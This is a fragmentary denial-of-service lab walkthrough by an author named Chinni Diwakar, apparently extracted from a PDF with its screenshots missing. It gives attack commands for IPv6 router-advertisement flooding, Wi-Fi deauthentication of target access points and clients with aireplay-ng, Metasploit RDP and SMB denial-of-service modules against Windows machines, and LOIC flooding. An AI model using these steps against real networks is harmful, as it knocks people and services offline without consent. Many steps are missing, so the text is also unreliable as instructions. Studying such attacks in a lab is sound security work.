009dos Lab
009dos Lab
Step 1: open a blank terminal and type ifconfig to find out your interface name
flood_router6 eth0
atk6-flood_router6 eth0
Chinni Diwakar 1
Meanwhile for the effected victim when he types ifconfig or ipconfig he will see output like this
Chinni Diwakar 2
Practical No 2: Dossing the wifi network using aireplay deauth packets
Requirements Kali linux latest version (not virtualbox kali) and wifi connection
Step 1: open a blank terminal and type iwconfig to find out your wifi interface name
Chinni Diwakar 3
Step 2: enabling monitor mode, execute the following code
Chinni Diwakar 4
this will turn your wifi interface name into wlan0mon like name
airodump-ng wlan0mon
this will show you the available wifi networks around you please note down the BSSID (MAC) and
channel and essid.
airodump-ng --bssid <TARGET AP MAC> --channel <channel no of target> <wifi monitormode interface>
from the above command you will get output like station mac note down those mac addresses to dos on
them
Chinni Diwakar 5
Step 5: Dossing on station macs
aireplay-ng -0 0 –a <target AP mac> -c <target client or station MAC> <wifi monitormode interface>
Chinni Diwakar 6
Practical No 3: RDP dos on windows 7 and server 2008 machines using msfconsole
Step 2: msfconsole
Step 6: run
Chinni Diwakar 7
Practical No 4: SMB dos on windows machines using msfconsole
Step 2: msfconsole
Or search negotiate_response
Chinni Diwakar 8
Step 7: show options
Step 8: run
Chinni Diwakar 9
Ex: \\192.168.0.100\Shared\Anything
You can see the attack impacts of the above attacks in the below images,
Before Attack
During Attack
Chinni Diwakar 10
After Stopping Attack
Chinni Diwakar 11
Chinni Diwakar 12
Practical No 7: Using LOIC Tool to Attack on Target
After clicking on IMMA CHARGIN MAH LAZER you can see the following picture of flooding
Chinni Diwakar 13